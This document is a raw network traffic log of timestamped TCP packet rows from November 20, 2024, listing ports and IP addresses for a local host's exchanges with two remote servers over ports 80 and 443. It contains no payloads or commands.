Nov 20, 2024 08:28:05.887293100 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887334108 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887358904 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887394905 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887409925 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887430906 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887582064 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887630939 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887639046 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887679100 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887681007 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887768030 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887805939 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887820959 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887835979 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887857914 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887881994 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887893915 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887904882 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887929916 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:05.887938023 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:05.887974024 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:10.536474943 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:10.536515951 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:10.536725998 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:10.546838999 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:10.546853065 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:10.603801012 CET	80	49712	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:10.603873014 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:11.136842966 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.136918068 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.138633966 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.138641119 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.138879061 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.151786089 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.195331097 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.293248892 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.296859026 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.296875000 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.297003984 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.297028065 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.297230005 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.302556038 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.302660942 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.302683115 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.349087954 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.385730982 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.385751009 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.385909081 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.385925055 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.387576103 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.387708902 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.387716055 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.389477015 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.389636993 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.389646053 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.391585112 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.392014980 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.392023087 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.442871094 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.474232912 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.474247932 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.474299908 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.474309921 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.474376917 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.474376917 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.474394083 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.474435091 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.476239920 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.476300001 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.476315022 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.478209019 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.478287935 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.478336096 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.478348017 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.478446960 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.479993105 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.480113983 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.480134964 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.481874943 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.481929064 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.481945992 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.484435081 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.484488964 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.484497070 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.536639929 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.566081047 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.566092968 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.566230059 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.566245079 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.566416979 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.566531897 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.566540003 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.568114996 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.568197012 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.568205118 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.568540096 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.568649054 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.568656921 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.569794893 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.569926977 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.569936037 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.570044041 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.570185900 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.570194960 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.570708036 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.570776939 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.570785046 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.572813034 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.572931051 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.572946072 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.573049068 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.573216915 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.573226929 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.573662043 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.573785067 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.573798895 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.573909998 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.573956966 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.573976994 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.574423075 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.574479103 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.574486017 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.574939013 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.575083017 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.575090885 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.576085091 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.576164007 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.576170921 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.630410910 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.655549049 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.655630112 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.655633926 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.655651093 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.655700922 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.655715942 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.655762911 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.655868053 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.655879974 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.667840958 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.667896032 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.667936087 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.667948008 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.667960882 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.667979002 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668011904 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.668025017 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668051004 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.668070078 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668104887 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668148041 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.668312073 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.668322086 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668329000 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.668385983 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668415070 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.668530941 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.668533087 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668549061 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.668610096 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668610096 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.668936968 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.669002056 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.669053078 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.669053078 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.669059992 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.669115067 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.669173002 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.669248104 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.669265032 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.669271946 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.669323921 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.669394970 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.669394970 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.669401884 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.669442892 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.746479988 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.746555090 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.746562958 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.746577024 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.746607065 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.746630907 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.746638060 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.746696949 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.748225927 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.748296976 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.748305082 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.748668909 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.748773098 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.748781919 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.749213934 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.749407053 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.749414921 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.751260996 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.751329899 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.751338959 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.751470089 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.751523018 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.751530886 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.751826048 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.751924038 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.751926899 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.751941919 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.752037048 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.752043009 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.752123117 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.752661943 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.752763033 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.752768993 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.752882004 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.752958059 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.752970934 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.754530907 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.754604101 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.754621029 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.754761934 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.754823923 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.754832983 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.756422997 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.756510973 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.756519079 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.756583929 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.756628036 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.756634951 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.802334070 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.868371010 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.868469000 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.868486881 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.868556023 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.868643999 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.868653059 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.868799925 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.868874073 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.868891954 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.869091988 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.869178057 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.869193077 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.869275093 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.869347095 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.869374037 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.869550943 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.869779110 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.869807005 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.869817019 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.869843960 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.869965076 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870073080 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.870084047 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870140076 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870206118 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.870213985 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870331049 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870573997 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870631933 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870646000 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.870656967 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870682001 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870747089 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.870747089 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.870747089 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.870758057 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870893955 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870909929 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.870924950 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.870975971 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.871036053 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.871048927 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.871056080 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.871169090 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.871201992 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.871299982 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.871305943 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.911591053 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.959413052 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.959525108 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.959548950 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.959568977 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.959629059 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.959629059 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.959796906 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.959897041 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.959903955 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.959945917 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960026026 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.960032940 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960228920 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960323095 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.960330009 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960410118 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960535049 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960587978 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.960587978 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.960597992 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960750103 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960829973 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.960836887 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960894108 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.960982084 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.960989952 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961186886 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961247921 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.961256981 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961333990 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961421013 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.961429119 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961477041 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961565018 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.961574078 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961672068 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961776972 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.961786032 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961843014 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961906910 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.961915016 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.961986065 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.962047100 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.962058067 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.962173939 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:11.962239027 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:11.962245941 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.005430937 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.049839020 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.049891949 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.049918890 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.049935102 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.049968958 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.049974918 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.049974918 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.049989939 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.050013065 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.050112009 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.050147057 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.050261021 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.050266027 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.050273895 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.050334930 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.050340891 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.050416946 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.050487041 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.050493002 CET	443	49725	142.215.209.78	192.168.2.6
